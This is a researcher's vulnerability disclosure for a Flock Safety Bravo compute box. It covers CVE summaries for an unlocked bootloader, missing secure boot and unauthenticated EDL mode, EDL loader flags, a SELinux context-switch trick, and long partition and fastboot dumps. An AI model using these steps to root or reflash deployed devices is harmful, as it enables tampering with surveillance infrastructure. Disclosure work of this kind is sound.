All research was performed against a unit I owned and we did not and do not have any intention of disrupting any existing infrastructure. All disclosures are intended for research purposes only, on devices the researcher owns.
The compute box…
This is a super interesting system running a ThunderComm TurboX (QCS)6490-U8B running Android 13.
Quick info required by MITRE:
CVE-2025-59402
Vendor: Flock Safety
Model: The Bravo Compute Box
Firmware Version: (Android 13, Build ID: BRAVO_00.00_local_20241017, Kernel 5.4.180, Baseband RM520NGLAAR03A04M4G)
Problem Type: Lack of Authentication: EDL/QDL Mode
Description: Flock Safety Bravo Edge AI Compute Device BRAVO_00.00_local_20241017 accepts the default Thundercomm TurboX 6490 Firehose loader in EDL/QDL mode. This enables attackers with physical access to flash arbitrary firmware, dump partitions, and bypass bootloader and OS security controls.
Reference: Device Vendor Page
CVE-2025-59404
Vendor: Flock Safety
Model: The Bravo Compute Box
Firmware Version: (Android 13, Build ID: BRAVO_00.00_local_20241017, Kernel 5.4.180, Baseband RM520NGLAAR03A04M4G)
Problem Type: Unlocked Bootloader
Description: Flock Safety Bravo Edge AI Compute Device BRAVO_00.00_local_20241017 ships with its bootloader unlocked. This permits bypass of Android Verified Boot (AVB) and allows direct modification of partitions.
Reference: Device Vendor Page
CVE-2025-59408
Vendor: Flock Safety
Model: The Bravo Compute Box
Firmware Version: (Android 13, Build ID: BRAVO_00.00_local_20241017, Kernel 5.4.180, Baseband RM520NGLAAR03A04M4G)
Problem Type: Lack of Secure Boot
Description: Flock Safety Bravo Edge AI Compute Device BRAVO_00.00_local_20241017 ships with Secure Boot disabled. This allows an attacker to flash modified firmware with no cryptographic protections.
Reference: Device Vendor Page
See the image below for further version information.
I highly recommend reading my other posts relating to Flock Safety devices and especially the one about the Falcon/Sparrow found HERE as I went into some more detail that is relevant to this device as well.
I’m not still not super sure about the use of this device, although from the outside it’s quite interesting.
I don’t have a ton to disclose on this device beyond how to get a root shell and set selinux to permissive as there’s still a ton to look at. All of the vulnerabilities I disclosed minus lack of encryption apply here that I covered in the Falcon, so to summarize:
Vulnerability 1: Lack of Secure Boot – CVE-2025-59408
Vulnerability 2: Unlocked Bootloader – CVE-2025-59404
Vulnerability 3: Lack of Authentication: EDL/QDL Mode – CVE-2025-59402
You can follow the same reproduction steps I covered in the Falcon post for this one as well with some changes:
When using EDL, you want to use the proper firehose, which I obtained via a flea market supply chain attack, aka I bought one of these devices off the second hand market, and reached out to the manufacturer and requested access to the docs. That means along with the Falcon’s SoM, I can’t release the documentation and for this SoM, the firehouse is not public and thus I can’t share it.
This device uses ‘ufs’ instead of ’emmc’ and thus the EDL commands should be modified as so:
--memory=ufs --loader=prog_firehose_ddr.elfAnyway, to keep it brief, some other interesting vulnerabilities I found during my journey attempting to take the long way to get a root shell:
Bunch of apps are debuggable:
1|BRAVO:/ $ /system/bin/simpleperf_app_runner com.flocksafety.android.collins --show-app-type
debuggableA friend of mine delved deeper into what you can do with ‘jdwp’ and some of these, so I’ll definitely add a link to his post HERE once that’s up.
Another interesting thing is that I spent a bunch of time audting the selinux policy, and although I didn’t find any accessible transitions to get around it, I did find that you can transition to the ‘u:r:vendor_shell:s0’ context even if when you try to use ‘runcon’ it doesn’t work:
BRAVO:/ $ runcon u:r:vendor_shell:s0 /system/bin/sh
runcon: Could not set context to u:r:vendor_shell:s0: Permission denied
1|BRAVO:/ $All you have to do once you’re in the restricted shell:
/vendor/bin/shThen if you do check, you’ll see you’re in a different context:
1|BRAVO:/ $ /vendor/bin/sh
BRAVO:/ $ id -Z
u:r:vendor_shell:s0
BRAVO:/ $Didn’t result in anything fruitful, but interesting nonetheless.
Anyway, expect more to come in regards to this device and the others as there’s still much more to hack.
Now, if you notice in the front of the device there’s two USB-C ports. The main one I’ll be using is the black one as the green one is for charging.
You’ll first want to unscrew the case and we’ll need access to the buttons on the board (or a Qualcomm EDL/Flash cable) to get the board into EDL mode easily. Additionally, if you get the device stuck in EDL mode, if you turn it on/restart it while holding the middle two buttons on the board, it’ll put it in fastboot mode and thus out of EDL mode. Then you can just “fasboot reboot” and it’ll boot normally.
To get a restricted shell, there’s no special dip switches or anything time around, just turn it on and wait for it to boot up and you’ll be able to adb shell.
Here’s some information about the device:
EDL PrintGPT Output:
└─# ./edl --loader=prog_firehose_ddr.elf printgpt
Qualcomm Sahara / Firehose Client V3.62 (c) B.Kerler 2018-2024.
main - Using loader prog_firehose_ddr.elf ...
main - Waiting for the device
main - Device detected :)
main - Mode detected: firehose
Parsing Lun 0:
-------------
ssd: Offset 0x0000000000006000, Length 0x0000000000002000, Flags 0x0000000000000000, UUID 9bc13cdc-82e0-88d5-c693-103191f3d2a9, Type 0x2c86e742, Active False
persist: Offset 0x0000000000008000, Length 0x0000000002000000, Flags 0x0000000000000000, UUID 8902fc35-5b77-4647-e84b-8da793dff88c, Type 0x6c95e238, Active False
misc: Offset 0x0000000002008000, Length 0x0000000000100000, Flags 0x0000000000000000, UUID 6eb751a5-1ae1-1088-0027-860b563d12e5, Type 0x82acc91f, Active False
keystore: Offset 0x0000000002108000, Length 0x0000000000080000, Flags 0x0000000000000000, UUID 3b2203d9-80fd-9521-5423-9db1442ac246, Type 0xde7d4029, Active False
frp: Offset 0x0000000002188000, Length 0x0000000000080000, Flags 0x0000000000000000, UUID 7f46cd8c-c37a-d7fb-3ab6-a1db59a24c3c, Type 0x91b72d4d, Active False
super: Offset 0x0000000002208000, Length 0x0000000180000000, Flags 0x0000000000000000, UUID 67aec66b-85ac-dc81-a1eb-a5cdec5b140e, Type 0x89a12de1, Active False
vbmeta_system_a: Offset 0x0000000182208000, Length 0x0000000000010000, Flags 0x1004000000000000, UUID 09fb7922-759e-6f37-754f-00a12a89f26a, Type 0x1344859d, Active True
vbmeta_system_b: Offset 0x0000000182218000, Length 0x0000000000010000, Flags 0x1000000000000000, UUID 397291bc-321b-5a3b-4eb7-6342c1c70d6d, Type 0xfe3ab853, Active False
metadata: Offset 0x0000000182228000, Length 0x0000000001000000, Flags 0x0000000000000000, UUID 5389d2d3-c6e8-551e-0bc2-903eedda7062, Type 0x988a98c9, Active False
rawdump: Offset 0x0000000183228000, Length 0x000000030c800000, Flags 0x0000000000000000, UUID 1b5d2c40-cecf-c738-6635-3c6846eed9f3, Type 0x66c9b323, Active False
media: Offset 0x000000048fa28000, Length 0x0000002d00000000, Flags 0x0000000000000000, UUID c34eb691-b8ae-b3ed-b034-f7637f09a3e2, Type 0x9bfb381c, Active False
userdata: Offset 0x000000318fa28000, Length 0x0000000940dd3000, Flags 0x0000000000000000, UUID 84ca0ca3-037e-7c27-5eed-d0668f9a7632, Type 0x1b81e7e6, Active False
Total disk size:0x0000003ad0800000, sectors:0x0000000003ad0800
Parsing Lun 1:
GPT Table:
-------------
xbl_a: Offset 0x0000000000006000, Length 0x0000000000385000, Flags 0x1044000000000000, UUID ab9c6fe0-7d94-2392-5a52-833902fd41c3, Type 0xdea0ba2c, Active True
xbl_config_a: Offset 0x000000000038b000, Length 0x000000000003a000, Flags 0x0044000000000000, UUID 104653b3-ff75-0db4-9d4c-19718883fdda, Type 0x5a325ae4, Active True
Total disk size:0x0000000000800000, sectors:0x0000000000000800
Parsing Lun 2:
GPT Table:
-------------
xbl_b: Offset 0x0000000000006000, Length 0x0000000000385000, Flags 0x1000000000000000, UUID afb486dc-41e5-992b-d855-79e9b02612b0, Type 0xdea0ba2c, Active False
xbl_config_b: Offset 0x000000000038b000, Length 0x000000000003a000, Flags 0x0000000000000000, UUID e9aead08-6861-e28e-0052-34c459b50df5, Type 0x5a325ae4, Active False
Total disk size:0x0000000000800000, sectors:0x0000000000000800
Parsing Lun 3:
GPT Table:
-------------
ALIGN_TO_128K_1: Offset 0x0000000000006000, Length 0x000000000001a000, Flags 0x1000000000000000, UUID 6eda237b-5a03-9390-3701-c4b66d287146, Type 0xfde1604b, Active False
cdt: Offset 0x0000000000020000, Length 0x0000000000020000, Flags 0x1000000000000000, UUID c572aea9-4560-e7db-6182-76c65a628c39, Type 0xa19f205f, Active False
ddr: Offset 0x0000000000040000, Length 0x0000000000100000, Flags 0x1000000000000000, UUID fc377d78-bfc3-35b8-76a8-ddd00dea22a9, Type 0x20a0c19c, Active False
Total disk size:0x0000000002000000, sectors:0x0000000000002000
Parsing Lun 4:
GPT Table:
-------------
aop_a: Offset 0x0000000000006000, Length 0x0000000000080000, Flags 0x1044000000000000, UUID 44fed73b-4888-4a00-b5db-38a6d83d720d, Type 0xd69e90a5, Active True
tz_a: Offset 0x0000000000086000, Length 0x0000000000400000, Flags 0x1044000000000000, UUID 841e5f4e-2035-b3da-1000-e38c80df0e19, Type 0xa053aa7f, Active True
hyp_a: Offset 0x0000000000486000, Length 0x0000000000800000, Flags 0x0044000000000000, UUID eecc811f-013a-0b1f-835e-26a0be750344, Type 0xe1a6a689, Active True
modem_a: Offset 0x0000000000c86000, Length 0x000000000dc00000, Flags 0x1044000000000000, UUID 338694e4-d657-d970-3791-ba5882296ca2, Type EFI_BASIC_DATA, Active True
bluetooth_a: Offset 0x000000000e886000, Length 0x0000000000400000, Flags 0x1044000000000000, UUID 98adb260-ac08-3aec-7be3-5672b51ceafa, Type 0x6cb747f1, Active True
mdtpsecapp_a: Offset 0x000000000ec86000, Length 0x0000000000400000, Flags 0x1044000000000000, UUID 832d101b-4ef4-207a-5d01-51e6ca19d575, Type 0xea02d680, Active True
mdtp_a: Offset 0x000000000f086000, Length 0x0000000002000000, Flags 0x1044000000000000, UUID d00cb145-0303-b7d2-4217-4271e8f1ec51, Type 0x3878408a, Active True
abl_a: Offset 0x0000000011086000, Length 0x0000000000100000, Flags 0x1044000000000000, UUID eddafd76-3d14-a06f-aadf-717c582d5909, Type 0xbd6928a1, Active True
dsp_a: Offset 0x0000000011186000, Length 0x0000000004000000, Flags 0x1044000000000000, UUID c891441f-0bd9-701d-442c-2bec73157482, Type 0x7efe5010, Active True
keymaster_a: Offset 0x0000000015186000, Length 0x0000000000080000, Flags 0x1044000000000000, UUID 0f3d3f61-3c99-461e-4908-b22eca0bb3e5, Type 0xa11d2a7c, Active True
boot_a: Offset 0x0000000015206000, Length 0x0000000006000000, Flags 0x0077000000000000, UUID 873dce16-38b3-e2d5-7cfd-3af641da9a66, Type 0x20117f86, Active True
devcfg_a: Offset 0x000000001b206000, Length 0x0000000000020000, Flags 0x0044000000000000, UUID b4f92aa4-8bc7-8e36-4a98-923cef3dde58, Type 0xf65d4b16, Active True
qupfw_a: Offset 0x000000001b226000, Length 0x0000000000014000, Flags 0x0044000000000000, UUID 5d920179-eb22-83d2-e22e-2b91d1ee531f, Type 0x21d1219f, Active True
vbmeta_a: Offset 0x000000001b23a000, Length 0x0000000000010000, Flags 0x1044000000000000, UUID 223222cb-f31c-0d55-c973-c8eabc56d6ed, Type 0x4b7a15d6, Active True
dtbo_a: Offset 0x000000001b24a000, Length 0x0000000001800000, Flags 0x0044000000000000, UUID 6059e0d7-e1a1-51d3-81b1-62ec847547f4, Type 0x24d0d418, Active True
uefisecapp_a: Offset 0x000000001ca4a000, Length 0x0000000000200000, Flags 0x0004000000000000, UUID f5ecf3b7-5f37-9b02-2f40-7d2c4e67389f, Type 0xbe8a7e08, Active True
imagefv_a: Offset 0x000000001cc4a000, Length 0x0000000000200000, Flags 0x0044000000000001, UUID 6d441440-8f57-f4cf-9979-d04e17db1dc5, Type 0x17911177, Active True
shrm_a: Offset 0x000000001ce4a000, Length 0x0000000000020000, Flags 0x1044000000000000, UUID 3449043a-320f-2a95-6fb1-c91067c2680e, Type 0xcb74ca22, Active True
multiimgoem_a: Offset 0x000000001ce6a000, Length 0x0000000000008000, Flags 0x1044000000000000, UUID 9b360e07-dac1-15a8-a696-8e7ad30b7eba, Type 0xe126a436, Active True
cpucp_a: Offset 0x000000001ce72000, Length 0x0000000000100000, Flags 0x1044000000000000, UUID 9fee845c-91ea-42cb-cc25-4a44c4b9e790, Type 0x1e8615bd, Active True
featenabler_a: Offset 0x000000001cf72000, Length 0x0000000000020000, Flags 0x0004000000000000, UUID eb9a6a6e-3054-1880-5532-e255db3f77bb, Type 0x741813d2, Active True
vendor_boot_a: Offset 0x000000001cf92000, Length 0x0000000006000000, Flags 0x0004000000000000, UUID b621b267-fb14-e183-2c4e-17f58d6546c2, Type 0x6d286a7f, Active True
qmcs: Offset 0x0000000022f92000, Length 0x0000000001e00000, Flags 0x0000000000000000, UUID 3310638e-de31-2494-28d9-94835a4bf472, Type 0x358740b1, Active False
qweslicstore_a: Offset 0x0000000024d92000, Length 0x0000000000040000, Flags 0x1004000000000000, UUID 089c59a1-07f4-3fce-6d1b-d08d0d1fc6ee, Type 0x7bab3c93, Active True
aop_b: Offset 0x0000000024dd2000, Length 0x0000000000080000, Flags 0x0000000000000000, UUID 3bf2e17b-570c-3094-1632-2b300518e6d8, Type 0x77036cd4, Active False
tz_b: Offset 0x0000000024e52000, Length 0x0000000000400000, Flags 0x0000000000000000, UUID 976b50a2-4dd4-625f-5a93-e19c2c52fdc0, Type 0x77036cd4, Active False
hyp_b: Offset 0x0000000025252000, Length 0x0000000000800000, Flags 0x0000000000000000, UUID 19696cff-3e6b-b4cb-c825-91172cb598c9, Type 0x77036cd4, Active False
modem_b: Offset 0x0000000025a52000, Length 0x000000000dc00000, Flags 0x1000000000000000, UUID 8e2ee3ff-cc32-5e8c-3197-fda0228a44de, Type 0x77036cd4, Active False
bluetooth_b: Offset 0x0000000033652000, Length 0x0000000000400000, Flags 0x1000000000000000, UUID cc6d4f9b-4dca-59ec-03f2-80a811d57877, Type 0x77036cd4, Active False
mdtpsecapp_b: Offset 0x0000000033a52000, Length 0x0000000000400000, Flags 0x1000000000000000, UUID 7cb71213-b60d-90bf-6c2d-47bf3eaef202, Type 0x77036cd4, Active False
mdtp_b: Offset 0x0000000033e52000, Length 0x0000000002000000, Flags 0x1000000000000000, UUID 2fe49460-6154-2c20-9c5e-a30e6079d915, Type 0x77036cd4, Active False
abl_b: Offset 0x0000000035e52000, Length 0x0000000000100000, Flags 0x1000000000000000, UUID c80f2f00-92d7-43d8-a791-5951fb6a66f9, Type 0x77036cd4, Active False
dsp_b: Offset 0x0000000035f52000, Length 0x0000000004000000, Flags 0x1000000000000000, UUID a182d8c5-bcdf-7361-affe-6e7e6e570277, Type 0x77036cd4, Active False
keymaster_b: Offset 0x0000000039f52000, Length 0x0000000000080000, Flags 0x1000000000000000, UUID 4a401b87-dc27-888a-dfa9-738e27230492, Type 0x77036cd4, Active False
boot_b: Offset 0x0000000039fd2000, Length 0x0000000006000000, Flags 0x0000000000000000, UUID 252d3e7a-993f-d8a6-bee7-349a25a6c5fa, Type 0x77036cd4, Active False
devcfg_b: Offset 0x000000003ffd2000, Length 0x0000000000020000, Flags 0x0000000000000000, UUID 17a4f9a9-7c53-5c30-022b-282230dc1e54, Type 0x77036cd4, Active False
qupfw_b: Offset 0x000000003fff2000, Length 0x0000000000014000, Flags 0x0000000000000000, UUID 0287ccc3-ddd6-30ca-c141-d1a522b5b63f, Type 0x77036cd4, Active False
vbmeta_b: Offset 0x0000000040006000, Length 0x0000000000010000, Flags 0x1000000000000000, UUID c8f2c77b-4d8a-8fd1-20d2-7391452b9cf1, Type 0x77036cd4, Active False
dtbo_b: Offset 0x0000000040016000, Length 0x0000000001800000, Flags 0x0000000000000000, UUID 0922cf34-1c59-48e2-13c7-e1104d1e58f1, Type 0x77036cd4, Active False
uefisecapp_b: Offset 0x0000000041816000, Length 0x0000000000200000, Flags 0x0000000000000000, UUID a69ca517-d6df-03cf-c575-39645bcce9c6, Type 0x77036cd4, Active False
imagefv_b: Offset 0x0000000041a16000, Length 0x0000000000200000, Flags 0x0000000000000001, UUID b270c9fe-2b1a-2b10-e157-2e0894ba9700, Type 0x77036cd4, Active False
shrm_b: Offset 0x0000000041c16000, Length 0x0000000000020000, Flags 0x1000000000000000, UUID 9aadc969-4529-cd17-3031-826fbe47bbb5, Type 0x77036cd4, Active False
multiimgoem_b: Offset 0x0000000041c36000, Length 0x0000000000008000, Flags 0x1000000000000000, UUID 03319cac-0b5a-67df-3841-9ac8c5880312, Type 0x77036cd4, Active False
cpucp_b: Offset 0x0000000041c3e000, Length 0x0000000000100000, Flags 0x1000000000000000, UUID cdde63e1-d7a4-d77c-a625-52b18897afab, Type 0x77036cd4, Active False
featenabler_b: Offset 0x0000000041d3e000, Length 0x0000000000020000, Flags 0x0000000000000000, UUID 8c3c7e28-8df4-46f4-9298-754647f1c5b1, Type 0x77036cd4, Active False
vendor_boot_b: Offset 0x0000000041d5e000, Length 0x0000000006000000, Flags 0x0000000000000000, UUID 89e7f962-a041-a862-4553-b0e0431add8f, Type 0x77036cd4, Active False
qweslicstore_b: Offset 0x0000000047d5e000, Length 0x0000000000040000, Flags 0x1000000000000000, UUID 02c682fb-af01-a731-cbb6-187602dcf54a, Type 0x77036cd4, Active False
devinfo: Offset 0x0000000047d9e000, Length 0x0000000000001000, Flags 0x1000000000000000, UUID b5607ad9-33d8-d62f-a829-f58560a6ebb7, Type 0x65addcf4, Active False
dip: Offset 0x0000000047d9f000, Length 0x0000000000100000, Flags 0x1000000000000000, UUID 392aab7b-ce9f-226a-beb6-06a79c87fa3e, Type 0x4114b077, Active False
apdp: Offset 0x0000000047e9f000, Length 0x0000000000040000, Flags 0x0000000000000000, UUID 0927fa23-723d-75e6-57e4-d2b0ee55f925, Type 0xe6e98da2, Active False
splash: Offset 0x0000000047edf000, Length 0x00000000020a4000, Flags 0x0000000000000000, UUID 7749a6bf-4bdb-4c9f-b0a8-3bee3ae3e969, Type 0xad99f201, Active False
limits: Offset 0x0000000049f83000, Length 0x0000000000001000, Flags 0x1000000000000000, UUID a0105999-07e0-92cd-17a3-4ae46794f662, Type 0x10a0c19c, Active False
limits-cdsp: Offset 0x0000000049f84000, Length 0x0000000000001000, Flags 0x1000000000000000, UUID 3be15615-ec07-cc5e-b8f7-77cb3aff8041, Type 0x545d3707, Active False
toolsfv: Offset 0x0000000049f85000, Length 0x0000000000100000, Flags 0x1000000000000000, UUID 206edf7f-ec39-e9dd-194c-9e45567fdff3, Type 0x97745aba, Active False
logfs: Offset 0x000000004a085000, Length 0x0000000000800000, Flags 0x0000000000000000, UUID 94e04836-2ec0-46ae-25fa-263f0126a788, Type 0xbc0330eb, Active False
quantumsdk: Offset 0x000000004a885000, Length 0x0000000002800000, Flags 0x0000000000000000, UUID df4b78f4-c81e-e8b7-f141-17f46606934f, Type 0xaa9a5c4c, Active False
logdump: Offset 0x000000004d085000, Length 0x0000000020000000, Flags 0x0000000000000000, UUID 15fca6c1-a012-64f7-247d-487ae0e44aca, Type 0x5af80809, Active False
storsec: Offset 0x000000006d085000, Length 0x0000000000020000, Flags 0x1000000000000000, UUID 809f6fe4-320b-cdb5-da75-a1b6658628fa, Type 0x2db45fe, Active False
uefivarstore: Offset 0x000000006d0a5000, Length 0x0000000000080000, Flags 0x1000000000000000, UUID c2f48685-6dc7-3e11-bb04-59c243e22bc3, Type 0x165bd6bc, Active False
secdata: Offset 0x000000006d125000, Length 0x0000000000007000, Flags 0x1000000000000000, UUID 7d960e2f-4671-3952-f409-6ae306e86eb3, Type 0x76cfc7ef, Active False
catefv: Offset 0x000000006d12c000, Length 0x0000000000080000, Flags 0x1000000000000000, UUID edd0ed17-7eed-02ea-1728-403369571e79, Type 0x80c23c26, Active False
catecontentfv: Offset 0x000000006d1ac000, Length 0x0000000000100000, Flags 0x1000000000000000, UUID 86150137-f528-e6f4-8272-495cafe0a60a, Type 0xe12d830b, Active False
vm-data: Offset 0x000000006d2ac000, Length 0x00000000020a4000, Flags 0x0000000000000000, UUID b3dc7f2a-0af7-83ab-174c-55534cb0966b, Type 0x21adb864, Active False
mdcompress: Offset 0x000000006f350000, Length 0x0000000001400000, Flags 0x1000000000000000, UUID 0112944a-3ffc-5442-d42a-16438d3d63f6, Type 0xc6a5a9f5, Active False
connsec: Offset 0x0000000070750000, Length 0x0000000000020000, Flags 0x1000000000000000, UUID 366ad9ff-7341-6f62-638b-42b2b0e8c1cb, Type 0x6a716f7c, Active False
tzsc: Offset 0x0000000070770000, Length 0x0000000000020000, Flags 0x1000000000000000, UUID ee2e2a1e-80b3-af3e-980d-c7a8df105a34, Type 0x478dea49, Active False
rtice: Offset 0x0000000070790000, Length 0x0000000000080000, Flags 0x1000000000000000, UUID 516198c8-9110-0745-92d8-2f1701579651, Type 0xe396d1ea, Active False
Total disk size:0x00000000c0000000, sectors:0x00000000000c0000
Parsing Lun 5:
GPT Table:
-------------
ALIGN_TO_128K_2: Offset 0x0000000000006000, Length 0x000000000001a000, Flags 0x1000000000000000, UUID cd75e5a9-fdf1-7188-7e1d-901140d8c7ea, Type 0x6891a3b7, Active False
modemst1: Offset 0x0000000000020000, Length 0x0000000000300000, Flags 0x0000000000000000, UUID 4082a03a-f28f-b05b-9b4e-abaf785d51a3, Type 0xebbeadaf, Active False
modemst2: Offset 0x0000000000320000, Length 0x0000000000300000, Flags 0x0000000000000000, UUID fc4a18b3-8a06-7f45-00af-686bd389145d, Type 0xa288b1f, Active False
fsg: Offset 0x0000000000620000, Length 0x0000000000300000, Flags 0x1000000000000000, UUID a40fd95b-f246-9599-26e3-3bac57aaea40, Type 0x638ff8e2, Active False
fsc: Offset 0x0000000000920000, Length 0x0000000000020000, Flags 0x0000000000000000, UUID 4df59a94-005d-9550-7161-1309cd217530, Type 0x57b90a16, Active False
Total disk size:0x0000000002000000, sectors:0x0000000000002000Fastboot getvar all output:
┌──(rootă‰¿SectorTL)-[/home/nigel/edl]
└─# fastboot getvar all
(bootloader) parallel-download-flash:yes
(bootloader) hw-revision:10000
(bootloader) unlocked:yes
(bootloader) off-mode-charge:0
(bootloader) charger-screen-enabled:0
(bootloader) battery-soc-ok:yes
(bootloader) battery-voltage:3566
(bootloader) version-baseband:
(bootloader) version-bootloader:
(bootloader) erase-block-size: 0x1000
(bootloader) logical-block-size: 0x1000
(bootloader) variant:QCS UFS
(bootloader) partition-type:fsc:raw
(bootloader) partition-size:fsc: 0x20000
(bootloader) partition-type:fsg:raw
(bootloader) partition-size:fsg: 0x300000
(bootloader) partition-type:modemst2:raw
(bootloader) partition-size:modemst2: 0x300000
(bootloader) partition-type:modemst1:raw
(bootloader) partition-size:modemst1: 0x300000
(bootloader) partition-type:ALIGN_TO_128K_2:raw
(bootloader) partition-size:ALIGN_TO_128K_2: 0x1A000
(bootloader) partition-type:rtice:raw
(bootloader) partition-size:rtice: 0x80000
(bootloader) partition-type:tzsc:raw
(bootloader) partition-size:tzsc: 0x20000
(bootloader) partition-type:connsec:raw
(bootloader) partition-size:connsec: 0x20000
(bootloader) partition-type:mdcompress:raw
(bootloader) partition-size:mdcompress: 0x1400000
(bootloader) partition-type:vm-data:raw
(bootloader) partition-size:vm-data: 0x20A4000
(bootloader) partition-type:catecontentfv:raw
(bootloader) partition-size:catecontentfv: 0x100000
(bootloader) partition-type:catefv:raw
(bootloader) partition-size:catefv: 0x80000
(bootloader) partition-type:secdata:raw
(bootloader) partition-size:secdata: 0x7000
(bootloader) partition-type:uefivarstore:raw
(bootloader) partition-size:uefivarstore: 0x80000
(bootloader) partition-type:storsec:raw
(bootloader) partition-size:storsec: 0x20000
(bootloader) partition-type:logdump:raw
(bootloader) partition-size:logdump: 0x20000000
(bootloader) partition-type:quantumsdk:raw
(bootloader) partition-size:quantumsdk: 0x2800000
(bootloader) partition-type:logfs:raw
(bootloader) partition-size:logfs: 0x800000
(bootloader) partition-type:toolsfv:raw
(bootloader) partition-size:toolsfv: 0x100000
(bootloader) partition-type:limits-cdsp:raw
(bootloader) partition-size:limits-cdsp: 0x1000
(bootloader) partition-type:limits:raw
(bootloader) partition-size:limits: 0x1000
(bootloader) partition-type:splash:raw
(bootloader) partition-size:splash: 0x20A4000
(bootloader) partition-type:apdp:raw
(bootloader) partition-size:apdp: 0x40000
(bootloader) partition-type:dip:raw
(bootloader) partition-size:dip: 0x100000
(bootloader) partition-type:devinfo:raw
(bootloader) partition-size:devinfo: 0x1000
(bootloader) partition-type:qweslicstore_b:raw
(bootloader) partition-size:qweslicstore_b: 0x40000
(bootloader) partition-type:vendor_boot_b:raw
(bootloader) partition-size:vendor_boot_b: 0x6000000
(bootloader) partition-type:featenabler_b:raw
(bootloader) partition-size:featenabler_b: 0x20000
(bootloader) partition-type:cpucp_b:raw
(bootloader) partition-size:cpucp_b: 0x100000
(bootloader) partition-type:multiimgoem_b:raw
(bootloader) partition-size:multiimgoem_b: 0x8000
(bootloader) partition-type:shrm_b:raw
(bootloader) partition-size:shrm_b: 0x20000
(bootloader) partition-type:imagefv_b:raw
(bootloader) partition-size:imagefv_b: 0x200000
(bootloader) partition-type:uefisecapp_b:raw
(bootloader) partition-size:uefisecapp_b: 0x200000
(bootloader) partition-type:dtbo_b:raw
(bootloader) partition-size:dtbo_b: 0x1800000
(bootloader) partition-type:vbmeta_b:raw
(bootloader) partition-size:vbmeta_b: 0x10000
(bootloader) partition-type:qupfw_b:raw
(bootloader) partition-size:qupfw_b: 0x14000
(bootloader) partition-type:devcfg_b:raw
(bootloader) partition-size:devcfg_b: 0x20000
(bootloader) partition-type:boot_b:raw
(bootloader) partition-size:boot_b: 0x6000000
(bootloader) partition-type:keymaster_b:raw
(bootloader) partition-size:keymaster_b: 0x80000
(bootloader) partition-type:dsp_b:raw
(bootloader) partition-size:dsp_b: 0x4000000
(bootloader) partition-type:abl_b:raw
(bootloader) partition-size:abl_b: 0x100000
(bootloader) partition-type:mdtp_b:raw
(bootloader) partition-size:mdtp_b: 0x2000000
(bootloader) partition-type:mdtpsecapp_b:raw
(bootloader) partition-size:mdtpsecapp_b: 0x400000
(bootloader) partition-type:bluetooth_b:raw
(bootloader) partition-size:bluetooth_b: 0x400000
(bootloader) partition-type:modem_b:raw
(bootloader) partition-size:modem_b: 0xDC00000
(bootloader) partition-type:hyp_b:raw
(bootloader) partition-size:hyp_b: 0x800000
(bootloader) partition-type:tz_b:raw
(bootloader) partition-size:tz_b: 0x400000
(bootloader) partition-type:aop_b:raw
(bootloader) partition-size:aop_b: 0x80000
(bootloader) partition-type:qweslicstore_a:raw
(bootloader) partition-size:qweslicstore_a: 0x40000
(bootloader) partition-type:qmcs:raw
(bootloader) partition-size:qmcs: 0x1E00000
(bootloader) partition-type:vendor_boot_a:raw
(bootloader) partition-size:vendor_boot_a: 0x6000000
(bootloader) partition-type:featenabler_a:raw
(bootloader) partition-size:featenabler_a: 0x20000
(bootloader) partition-type:cpucp_a:raw
(bootloader) partition-size:cpucp_a: 0x100000
(bootloader) partition-type:multiimgoem_a:raw
(bootloader) partition-size:multiimgoem_a: 0x8000
(bootloader) partition-type:shrm_a:raw
(bootloader) partition-size:shrm_a: 0x20000
(bootloader) partition-type:imagefv_a:raw
(bootloader) partition-size:imagefv_a: 0x200000
(bootloader) partition-type:uefisecapp_a:raw
(bootloader) partition-size:uefisecapp_a: 0x200000
(bootloader) partition-type:dtbo_a:raw
(bootloader) partition-size:dtbo_a: 0x1800000
(bootloader) partition-type:vbmeta_a:raw
(bootloader) partition-size:vbmeta_a: 0x10000
(bootloader) partition-type:qupfw_a:raw
(bootloader) partition-size:qupfw_a: 0x14000
(bootloader) partition-type:devcfg_a:raw
(bootloader) partition-size:devcfg_a: 0x20000
(bootloader) partition-type:boot_a:raw
(bootloader) partition-size:boot_a: 0x6000000
(bootloader) partition-type:keymaster_a:raw
(bootloader) partition-size:keymaster_a: 0x80000
(bootloader) partition-type:dsp_a:raw
(bootloader) partition-size:dsp_a: 0x4000000
(bootloader) partition-type:abl_a:raw
(bootloader) partition-size:abl_a: 0x100000
(bootloader) partition-type:mdtp_a:raw
(bootloader) partition-size:mdtp_a: 0x2000000
(bootloader) partition-type:mdtpsecapp_a:raw
(bootloader) partition-size:mdtpsecapp_a: 0x400000
(bootloader) partition-type:bluetooth_a:raw
(bootloader) partition-size:bluetooth_a: 0x400000
(bootloader) partition-type:modem_a:raw
(bootloader) partition-size:modem_a: 0xDC00000
(bootloader) partition-type:hyp_a:raw
(bootloader) partition-size:hyp_a: 0x800000
(bootloader) partition-type:tz_a:raw
(bootloader) partition-size:tz_a: 0x400000
(bootloader) partition-type:aop_a:raw
(bootloader) partition-size:aop_a: 0x80000
(bootloader) partition-type:ddr:raw
(bootloader) partition-size:ddr: 0x100000
(bootloader) partition-type:cdt:raw
(bootloader) partition-size:cdt: 0x20000
(bootloader) partition-type:ALIGN_TO_128K_1:raw
(bootloader) partition-size:ALIGN_TO_128K_1: 0x1A000
(bootloader) partition-type:xbl_config_b:raw
(bootloader) partition-size:xbl_config_b: 0x3A000
(bootloader) partition-type:xbl_b:raw
(bootloader) partition-size:xbl_b: 0x385000
(bootloader) partition-type:xbl_config_a:raw
(bootloader) partition-size:xbl_config_a: 0x3A000
(bootloader) partition-type:xbl_a:raw
(bootloader) partition-size:xbl_a: 0x385000
(bootloader) partition-type:userdata:f2fs
(bootloader) partition-size:userdata: 0x940DD3000
(bootloader) partition-type:media:raw
(bootloader) partition-size:media: 0x2D00000000
(bootloader) partition-type:rawdump:raw
(bootloader) partition-size:rawdump: 0x30C800000
(bootloader) partition-type:metadata:ext4
(bootloader) partition-size:metadata: 0x1000000
(bootloader) partition-type:vbmeta_system_b:raw
(bootloader) partition-size:vbmeta_system_b: 0x10000
(bootloader) partition-type:vbmeta_system_a:raw
(bootloader) partition-size:vbmeta_system_a: 0x10000
(bootloader) partition-type:super:raw
(bootloader) partition-size:super: 0x180000000
(bootloader) partition-type:frp:raw
(bootloader) partition-size:frp: 0x80000
(bootloader) partition-type:keystore:raw
(bootloader) partition-size:keystore: 0x80000
(bootloader) partition-type:misc:raw
(bootloader) partition-size:misc: 0x100000
(bootloader) partition-type:persist:raw
(bootloader) partition-size:persist: 0x2000000
(bootloader) partition-type:ssd:raw
